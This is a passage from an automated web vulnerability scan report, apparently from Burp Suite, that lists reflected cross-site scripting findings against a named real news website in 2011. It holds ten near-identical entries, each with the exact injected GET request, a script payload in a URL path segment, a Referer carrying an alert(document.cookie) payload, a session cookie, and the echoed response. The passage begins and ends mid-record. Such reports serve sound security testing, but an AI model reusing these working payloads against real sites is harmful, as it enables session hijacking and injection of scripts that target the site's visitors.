Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery75573\"><script>alert(1)</script>aba3e01e65/ui.core.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.351. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc435"><script>alert(1)</script>273f81fd7b6 was submitted in the REST URL parameter 4. This input was echoed as cc435\"><script>alert(1)</script>273f81fd7b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.core.jscc435"><script>alert(1)</script>273f81fd7b6?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.core.jscc435\"><script>alert(1)</script>273f81fd7b6?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.352. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6a"><script>alert(1)</script>32526c1adac was submitted in the REST URL parameter 1. This input was echoed as 86d6a\"><script>alert(1)</script>32526c1adac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes86d6a"><script>alert(1)</script>32526c1adac/js/jquery/ui.dialog.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:55 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes86d6a\"><script>alert(1)</script>32526c1adac/js/jquery/ui.dialog.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.353. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b69d"><script>alert(1)</script>b482ecd7f34 was submitted in the REST URL parameter 2. This input was echoed as 5b69d\"><script>alert(1)</script>b482ecd7f34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js5b69d"><script>alert(1)</script>b482ecd7f34/jquery/ui.dialog.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js5b69d\"><script>alert(1)</script>b482ecd7f34/jquery/ui.dialog.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.354. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6570"><script>alert(1)</script>7617c121d11 was submitted in the REST URL parameter 3. This input was echoed as d6570\"><script>alert(1)</script>7617c121d11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryd6570"><script>alert(1)</script>7617c121d11/ui.dialog.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jqueryd6570\"><script>alert(1)</script>7617c121d11/ui.dialog.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.355. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c83"><script>alert(1)</script>2c7deadcccb was submitted in the REST URL parameter 4. This input was echoed as f4c83\"><script>alert(1)</script>2c7deadcccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.dialog.jsf4c83"><script>alert(1)</script>2c7deadcccb?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:25:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:25:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:25:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.dialog.jsf4c83\"><script>alert(1)</script>2c7deadcccb?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.356. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1faf3"><script>alert(1)</script>ba532f3735f was submitted in the REST URL parameter 1. This input was echoed as 1faf3\"><script>alert(1)</script>ba532f3735f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes1faf3"><script>alert(1)</script>ba532f3735f/js/jquery/ui.draggable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:31 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes1faf3\"><script>alert(1)</script>ba532f3735f/js/jquery/ui.draggable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.357. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d0d"><script>alert(1)</script>5688100798f was submitted in the REST URL parameter 2. This input was echoed as 62d0d\"><script>alert(1)</script>5688100798f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js62d0d"><script>alert(1)</script>5688100798f/jquery/ui.draggable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:21 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js62d0d\"><script>alert(1)</script>5688100798f/jquery/ui.draggable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.358. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2791"><script>alert(1)</script>b176f0618fd was submitted in the REST URL parameter 3. This input was echoed as b2791\"><script>alert(1)</script>b176f0618fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryb2791"><script>alert(1)</script>b176f0618fd/ui.draggable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jqueryb2791\"><script>alert(1)</script>b176f0618fd/ui.draggable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.359. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0afc"><script>alert(1)</script>4e6d203c207 was submitted in the REST URL parameter 4. This input was echoed as d0afc\"><script>alert(1)</script>4e6d203c207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.draggable.jsd0afc"><script>alert(1)</script>4e6d203c207?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.draggable.jsd0afc\"><script>alert(1)</script>4e6d203c207?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.360. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa97"><script>alert(1)</script>7078a85650f was submitted in the REST URL parameter 1. This input was echoed as afa97\"><script>alert(1)</script>7078a85650f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesafa97"><script>alert(1)</script>7078a85650f/js/jquery/ui.droppable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:16 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
